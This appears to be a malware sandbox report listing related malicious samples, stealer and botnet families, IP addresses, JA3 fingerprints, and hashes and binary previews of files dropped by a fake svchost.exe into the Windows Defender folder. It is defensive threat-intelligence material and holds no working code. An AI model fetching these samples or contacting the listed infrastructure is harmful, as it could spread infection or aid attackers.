LIQUIDWEBUS	uavINoSIQh.exe	Get hash	malicious	Simda Stealer	Browse	72.52.179.174
	7DAKMhINGk.exe	Get hash	malicious	Simda Stealer	Browse	72.52.179.174
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	69.167.163.88
	SHIPPING DOC.exe	Get hash	malicious	FormBook	Browse	50.28.1.56
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	72.52.178.23
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	72.52.178.23
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	72.52.178.23
	SetupRST.exe	Get hash	malicious	Unknown	Browse	72.52.178.23
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	72.52.178.23
	jklx86.elf	Get hash	malicious	Unknown	Browse	96.30.37.143
AMAZON-AESUS	uavINoSIQh.exe	Get hash	malicious	Simda Stealer	Browse	44.221.84.105
	7DAKMhINGk.exe	Get hash	malicious	Simda Stealer	Browse	44.221.84.105
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	44.210.24.233
	Attachment-914011545-004.pdf	Get hash	malicious	Unknown	Browse	54.144.73.197
	http://swctch.com	Get hash	malicious	Unknown	Browse	52.2.182.50
	Payslip Notification #5800210900 11112024.eml	Get hash	malicious	Unknown	Browse	23.22.254.206
	90876654545.exe	Get hash	malicious	DBatLoader, FormBook	Browse	3.5.11.187
	GE AEROSPACE _WIRE REMITTANCE.xlsx	Get hash	malicious	Unknown	Browse	54.167.120.151
	Sampension-file-846845087.pdf	Get hash	malicious	Captcha Phish	Browse	52.21.71.129
	https://www.google.com/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rqjkphmdlmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/RTupG#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t	Get hash	malicious	HTMLPhisher	Browse	23.22.158.217
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	uavINoSIQh.exe	Get hash	malicious	Simda Stealer	Browse	106.15.232.163
	7DAKMhINGk.exe	Get hash	malicious	Simda Stealer	Browse	106.15.232.163
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	120.79.48.98
	sora.mips.elf	Get hash	malicious	Mirai	Browse	8.188.166.167
	mips.elf	Get hash	malicious	Unknown	Browse	47.93.221.102
	C6y77dS3l7.exe	Get hash	malicious	Unknown	Browse	118.31.219.198
	Wiu8X6685m.exe	Get hash	malicious	Unknown	Browse	118.31.219.198
	WUa1Tm8Dlv.exe	Get hash	malicious	Unknown	Browse	118.31.219.198
	yakuza.arm4.elf	Get hash	malicious	Unknown	Browse	47.126.44.187
	botnet.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	47.112.29.92

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	uavINoSIQh.exe	Get hash	malicious	Simda Stealer	Browse	188.114.97.3 99.83.170.3 188.114.96.3 75.2.71.199
	7DAKMhINGk.exe	Get hash	malicious	Simda Stealer	Browse	188.114.97.3 99.83.170.3 188.114.96.3 75.2.71.199
	11315781264#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	188.114.97.3 99.83.170.3 188.114.96.3 75.2.71.199
	P52mX04112024145925383.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.114.97.3 99.83.170.3 188.114.96.3 75.2.71.199
	Factura Honorarios 2024-11-04.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3 99.83.170.3 188.114.96.3 75.2.71.199
	CERTIFICADO TITULARIDAD.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3 99.83.170.3 188.114.96.3 75.2.71.199
	Anfrage.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.114.97.3 99.83.170.3 188.114.96.3 75.2.71.199
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	188.114.97.3 99.83.170.3 188.114.96.3 75.2.71.199
	Request for Quotation 11-11-2024#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	188.114.97.3 99.83.170.3 188.114.96.3 75.2.71.199
	074c592b-5cc0-496d-b3fa-45a09d4363ce#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	188.114.97.3 99.83.170.3 188.114.96.3 75.2.71.199

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	593
Entropy (8bit):	7.626935561277827
Encrypted:	false
SSDEEP:	12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
MD5:	926512864979BC27CF187F1DE3F57AFF
SHA1:	ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
SHA-256:	B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
SHA-512:	F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
Malicious:	false
Preview:	....tp.-$\|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..\|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n\|..h_s.n....r..I..U.T..%N$.B..jj.\.....Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj....H.H...?G..O..tE..9..%.<+<......_.w..S....

C:\Program Files (x86)\Windows Defender\galyqaz.com

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	43360
Entropy (8bit):	7.989963401782778
Encrypted:	false
SSDEEP:	768:A6eLDU7W3WFK7jWC7qILQs3VmXYouw4MXo9hTlcH/x/S6m0/lVvgBQycLu:AD33bvWC7n73Yxxo950/U0/roBFci
MD5:	8E64B21E596D45FD6D98F9DE9071D166
SHA1:	5F3A7C93D556217A2CFCA93DAF935FD579391991
SHA-256:	5B086A2B53F566E74A046DE8852840D4D94E16C2DD129BDDB3A5EFD4E6F573C3
SHA-512:	80AD4D2BC7719F3E7547222DFF30439914AD254C6BF869D6410A15E5F81DA0BA37407B6172591BA3B4324F81882D8709412AC0B741940F3B7BDC00D78E0E6221
Malicious:	false
Preview:	...[..A.9l....A.D.[;.b..DD...}..n.o.zL......._O....r.:...%m8s...o..e....;+.q.o`3...%"..P.(}h1.H.;....%...$).\|...Y.V...:..B..X..Tsa...-.P+..?........8...R..w.q.....qV.O.+.......d.....7.Z.N..V-........i.Y..s.G./pe^......M..7..+..NI.\..l.1.d...`U..zc...7 ....!.7d.Z....Q.y.)u.o..'].v...;.....m......ah...?.......1W.Q....+<..<..\|^..fT.G....t..91......~V..Oq.).. ..W...3...C...iE. ^...f&..+.#.'....w.._...I...k.k.L[.:.....f.+.Y.'9wE..5.(...$.&p...V>E...s.'...m;jpJ..R....:J...f.O..c.YJ8....L...4.X.....k#.dEw..... .j}..f..A..........IU...=..5;.c.wx}@..k..R..i.L%L....e.}.#.l1...{..x.q..9s.f'b\;...X....b.X..A:.....y.w.&.+.{.j....n.JlP&$.7.....0........B.U.r.!@.G.,.:.c.>..IOx.:..^....".v..g;...-.u...."..$....+..k......aT..`op...................l..+)..y.Z`.........E...M..'w..%.9...G..7R...R.7:uG...\|d....X..h...e...A".....O.). v....$Q....5.....;..lU...L.....l.M.M8..4G.SkK.........q..3O...6..]..j.........y..59uC.Y'... :.c.h..b"1q. .....bk.(..

C:\Program Files (x86)\Windows Defender\pupydeq.com

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	6.479691220248167
Encrypted:	false
SSDEEP:	3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
MD5:	BFDE1E9E9C32C1681A16139450C6909D
SHA1:	7E669B927E6A75A10A0CA29E38E58DDCB49B725E
SHA-256:	E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
SHA-512:	781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
Malicious:	false
Preview:	...[..A.9l.....\|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

C:\Program Files (x86)\Windows Defender\puzylyp.com

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	59521
Entropy (8bit):	7.972524893534928
Encrypted:	false
SSDEEP:	1536:ZQimNJq4lkHqWmHwEyivDfOoG5tN06d+1h:ZRukFmHy4rG5tUh
MD5:	130380EE83250125DA1EE80F83658552
SHA1:	A9BFDF1FF251982DBF5D5CD569E7CADA7A991668
SHA-256:	5338DBA8A3AA260545117E6C768760C122247579254D30D97062BC0B67CCD0E4
SHA-512:	5D49229FE1EEB1E45B2EE13A8C6C63456346D6FD515A66E7368452EEF9164C9C5C80BB4254E6CEA52DF247B4771C1F403A32A3A63939EBDA41605710A3EC1A3F
Malicious:	false
Preview:	...[..A.9l.....\|.e.8w.!..1....j..r.^..r.....'..>....=.s.$$71...I...i.....==.7.rg~..j#.`S..y0,F..%....c...Kr).#FB...B...........H<../.. ..>.Y......:X..G..4.j....{W.A. .............6.P.Q..[).\.T...z.PK.n.P.2, ..CG..,...q..c....S.}.f..K..8...y=..+...S.b..cAMN.a.U.q.c3.9^.hD.+..'.....-.....(t...\|.....(.$.......`<..n..\|A..7.W..W...u..(eX&....C8....(.'..V..O.......F...:ET;^.B..(.N.:.a....n..........'A:..Q.!j..J.m.=.^.-=-.....*..>..bvF..K.H....8.9...g?=+..D.....9@...'ON.G'.J./....P..x.UGRWH.{8...u......jY(h..7..V.......i(..\|...,..\|;.e.+<;...l..I..,.Kf^....$.&.$.\|7....h..6Rn..+z.~/4W(......f.P..R6.....[a.~.h.+.u.[...sO.(Fzy.;.....<...A..@..N...<. ..Z... .g.+....p.(........#....r6.. Eo....3......jIg}.....z_..)'+....p............P?..h1..x.Nk.....M...Z.......0+.Yf.+.O.M..&V...X.fofX...wt.L#.R..h...z.....,../......m'..dsn\........V..4Eq....w....7.M.~ ...d.]ij.........1..\.....:.+y..).........O.,..v..C.EH.C.cI.3.:...7=PM.6.....C .d..

C:\Program Files (x86)\Windows Defender\qetyhyg.com

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	593
Entropy (8bit):	7.626935561277827
Encrypted:	false
SSDEEP:	12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
MD5:	926512864979BC27CF187F1DE3F57AFF
SHA1:	ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
SHA-256:	B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
SHA-512:	F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
Malicious:	false
Preview:	....tp.-$\|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..\|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n\|..h_s.n....r..I..U.T..%N$.B..jj.\.....Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj....H.H...?G..O..tE..9..%.<+<......_.w..S....

C:\Program Files (x86)\Windows Defender\qexyhuv.com

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	6.479691220248167
Encrypted:	false
SSDEEP:	3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
MD5:	BFDE1E9E9C32C1681A16139450C6909D
SHA1:	7E669B927E6A75A10A0CA29E38E58DDCB49B725E
SHA-256:	E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
SHA-512:	781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
Malicious:	false
Preview:	...[..A.9l.....\|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

C:\Program Files (x86)\Windows Defender\vofycot.com

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	25028
Entropy (8bit):	7.979460085616577
Encrypted:	false
SSDEEP:	768:m4ak8nl3r9Htbxcex6Ih+k0ijjWk5rSV4Z8tPzh3XCV5:jJElb9HVTh+8jWKW4S8P
MD5:	07C3098FEE53C5CB71BF0F05E67F5E90
SHA1:	DEA68EBE598CDF27C5B1FDACA77646B20C798E13
SHA-256:	7862546DEA13CE7AD77D0DF7BCA94DAE655EBC670B7530C4441048EB69C62F82
SHA-512:	D3D6F8FF91A2B128268862B72004D405EA83F1F099DE17737AB2B9403761A413BA0229A48016D158850201E92DAAD852CD1CF22FE17ACC938906B04F4AB79792
Malicious:	false
Preview:	...[..A.9l.....\|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g..>\|.....M#.g..0.1.~.5...`.X..z...SOS(.y.l(v>hH.l...."..q.Yg..%......'.kK...c..Bw..`r..Y.p..c....p.D.l.n .)..%..l...p.....a......h...e....g.<.......;). ?..zI..kW.......&.. :.>.....tW..j:.".........T...M... X.;.TB.'s.^vC>.:.....=..R..VZ..%.k..].>w..O.;.a.R.!-<.....$...$..f4...G.C..R.w.....dyn:....BD..aZ...v.G.C#...l......w.TW.RO.k<.KA.....'./d.. ....H......am.J...\|..d\|..\|.9 6...x......0.Ww.....l.h.j.m-...~..+.#..v{.!r.=..^....{.M..H....<?.v.1.h.b.x......n+V#Jo-.6..D._-...SZ....I...~.o..I...;.u.*....n.+.......+FA..mc....:Im.S..8..>....d.Id......zK..qtqH...;..........Z..V/..e9..r..Qw.....k\......M.f#.Xi.D.M....t....RWf&hV...in.Lk...=....x....l.........m&..A(t.............dGs....`....).A.w}..I6..=p.........r..R......s.!%C.;........z...[.Z.....Z.e..).(...#/.G.c......Z(.c..

C:\Program Files (x86)\Windows Defender\vojyqem.com

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1094
Entropy (8bit):	7.845642348405241
Encrypted:	false
SSDEEP:	24:IZsdS4WMBLdxezuQj1kZ8l9KfPqiHZ5teGkTXRUubjU:QsSixez1Rg8yn5t5kTXRdjU
MD5:	49983686F457B286C42A11834E4AE73A
SHA1:	81E4798B6632FCE548724C11E14537FA20E9977B
SHA-256:	29F8688592935A2262FDA4B0955F9B43BCDF0F81D2AA611A8BC73AA427AF761D
SHA-512:	DE0FCF7C23CFFC200D8602F46251309E940EB07CE13C57E3E8FC9CCECAFD27EE12FB658B5ABBD220FE240849DA9D7189DA9E757F0EE916800B25274E5BF4AC23
Malicious:	false
Preview:	...{:.a)9l.....(.\|.t;....>....V>.%.B...........%$......P...J^X..q....z...<.%...U<e..U9.y".[.F7..r5....=.;ZO.../.......%....}..~:...3;.s...s/2../....2.f..F%H.....uJ.".e.....-.....,....U....L../..~...S$.%.TXC. evx.....t0..e.z=...P....(.r..`..~...}t...0l...D.).Ju.X..c.B.\|.lv....5h.:...}...."..R.\|g...?.....).2A......op.,8..{Z..7..O.....i..-7.:....[`Q..Pb.(.....L......L...5]W&X...s6..B_s.n......r..._.EZ...m.a._..+>.FO...9.G./u;G..\.`.....7.v..g g./.._.`...H.\.".;x2#..Uj..U.g.c..-@.....O...9..+gn..~y.Asx.>......^..w..+.J.....8!.WaO.0Q.xk..e.1<6...s..[...=.Rv..@...b.i.-.mp....+..x.#..p~.4D(.!.......r..y.B6.....p.c.b.+.e.L....!.E/N;3.x...P=........R..... ..X.-..s. .&.._6z....^......Sd..\|......2.)....&......wc....@A..ZsM....."..........\...:...,.9>.6..;R*..\|........\|.N>.,...K.. s...U9}<g....p5..).B..W...f..S...1.[...J....ohU..........#..lk]...v....\|...^L..!^..0@.........$.........R.rGY.{.........O4..Y.[2....Q.c..;..... Z.C.`.......=.c..

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_0ca87790-bd51-413e-ba81-96dde7b94f9c\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0205324866795535
Encrypted:	false
SSDEEP:	192:gdXreYzdb0BU/NdadDjRJd6TzuiFZZ24IO8TdN:gNrDdoBU/N8xjPCzuiFZY4IO8TH
MD5:	F2235D2CD7428A1B48F942E4ADFEB0A9
SHA1:	69EEC65F30DDC8901A83CA31B5DE812D563C08FC
SHA-256:	82313FDC16256EC5CE41E298D8DD2994F9835207F229D2B305A9C4B818ECC3F3
SHA-512:	2F6A98C53ABF1C8A59A4CE11EF0A78DC5950399CA7248BBECA09E1B5DB209CF7637F52CB091A4CF900A9BFC3CE303C700B4494FE0FC1E76E65A761A40413FF3C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.8.2.2.2.4.3.5.1.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.8.2.3.4.6.2.2.6.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.c.a.8.7.7.9.0.-.b.d.5.1.-.4.1.3.e.-.b.a.8.1.-.9.6.d.d.e.7.b.9.4.f.9.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.8.1.f.b.2.0.-.b.6.6.d.-.4.2.5.d.-.a.2.1.e.-.6.9.9.5.7.5.1.c.8.4.2.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.5.4.-.0.0.0.1.-.0.0.1.5.-.5.5.0.6.-.4.8.f.1.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.f.c.b.1.b.9.6.5.8.0.0.d.3.d.7.2.1.3.4.d.a.e.3.7.7.0.a.e.a.3.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_1d7f431f-f9cb-4e9c-bfbf-ed80f22385e4\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9525353247285947
Encrypted:	false
SSDEEP:	192:lReYzEb0BU/NdadDjRJduzuiFZZ24IO8TdN+:DDEoBU/N8xjPczuiFZY4IO8TH
MD5:	BDEF8F6FA8B85BC6BDFFD6CE3EB4FB86
SHA1:	7480FD472226E234AA4BAD64FECFB0CE2880E1EC
SHA-256:	B01C538917D9DD3A5777ED23B19E6B7B4A2BC982715F53E5BA7F506DF7ACDC97
SHA-512:	332BAF55BD89C54615CB9FF2A8A079A24EA8723B9F43A973B09C32118C851301C5FCB7D9857AABB3B8631E24143794FD3F60600F5CB8C74BFF1360BB388F838E
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.8.2.7.9.6.4.4.5.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.8.3.0.9.6.4.4.6.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.7.f.4.3.1.f.-.f.9.c.b.-.4.e.9.c.-.b.f.b.f.-.e.d.8.0.f.2.2.3.8.5.e.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.e.e.c.7.4.8.d.-.7.4.b.6.-.4.1.1.c.-.a.e.b.8.-.b.9.1.9.b.3.9.a.d.0.5.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.5.8.-.0.0.0.1.-.0.0.1.5.-.4.1.1.b.-.3.c.f.1.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.f.c.b.1.b.9.6.5.8.0.0.d.3.d.7.2.1.3.4.d.a.e.3.7.7.0.a.e.a.3.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_39b20be6-b6c8-4156-bb27-d8bd9e89fd50\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9748656565526946
Encrypted:	false
SSDEEP:	192:hrGeYz1b0BU/NdadDjRJdKzuiFZZ24IO8TdN:ID1oBU/N8xjP4zuiFZY4IO8TH
MD5:	64DC2406B2ED98F348211A7A9A490AC8
SHA1:	2A28E64503081AFC665AE098AE5A0BA00A81C69C
SHA-256:	3D9CF67E399ABF3B9A075A4ED447B0CBAE3BFCCCDD8AE70DC8B874776977DD2F
SHA-512:	42DDA74A06A0455406123C9F8A40E4F17B3C5189488CA503E515F9F1C776A00A6FFC464895E58CEF10E7E9E821FB9144DEBA374632C7093D21C91824D07AD6DB
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.8.1.7.4.2.2.6.0.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.8.1.8.3.9.1.3.6.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.b.2.0.b.e.6.-.b.6.c.8.-.4.1.5.6.-.b.b.2.7.-.d.8.b.d.9.e.8.9.f.d.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.6.8.b.8.e.3.-.b.4.9.c.-.4.4.5.f.-.9.7.6.6.-.9.7.9.4.7.9.8.9.3.5.9.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.7.8.-.0.0.0.1.-.0.0.1.5.-.8.6.8.b.-.4.d.f.1.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.f.c.b.1.b.9.6.5.8.0.0.d.3.d.7.2.1.3.4.d.a.e.3.7.7.0.a.e.a.3.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_4d295e18-5df1-40f8-b1ec-09b7d29e22ba\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0199623661796051
Encrypted:	false
SSDEEP:	192:RBLGeYzOb0BU/NdadDjRJd6TzuiFZZ24IO8TdN:LGDOoBU/N8xjPCzuiFZY4IO8TH
MD5:	B9F95048359C366DA97B014C6948F510
SHA1:	73372D47F9E1E8D2D9C35120B8BF56D52F1DA42B
SHA-256:	45BE0BF733CB98C21EFE982A916457B43967465DEFAD0E005824FA0B5D1145AE
SHA-512:	7CF27451F7729A24C9ACAFAEA7BFD67034FFDC2862364DF7620F5174024D17380F2EC6EE51D77E0C98F9789E56D6138F05893FC555FCD07F939537881A3AFA74
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.8.8.1.4.3.5.6.6.1.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.8.8.1.7.3.7.2.2.4.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.2.9.5.e.1.8.-.5.d.f.1.-.4.0.f.8.-.b.1.e.c.-.0.9.b.7.d.2.9.e.2.2.b.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.9.b.d.e.6.e.-.a.c.e.c.-.4.e.e.f.-.b.f.d.a.-.7.d.8.4.6.f.8.3.c.3.c.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.7.8.-.0.0.0.1.-.0.0.1.5.-.2.8.c.a.-.5.1.f.1.5.c.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.f.c.b.1.b.9.6.5.8.0.0.d.3.d.7.2.1.3.4.d.a.e.3.7.7.0.a.e.a.3.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.N.c.Y.L.g.t.X.I.K.J.g.H.j...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NcYLgtXIKJgHj.ex_191ad5ea639312cff7437352e3e5dd3555cd58_1382581b_91456292-83cf-467e-b9c9-41948fe3bc74\Report.wer

Download File

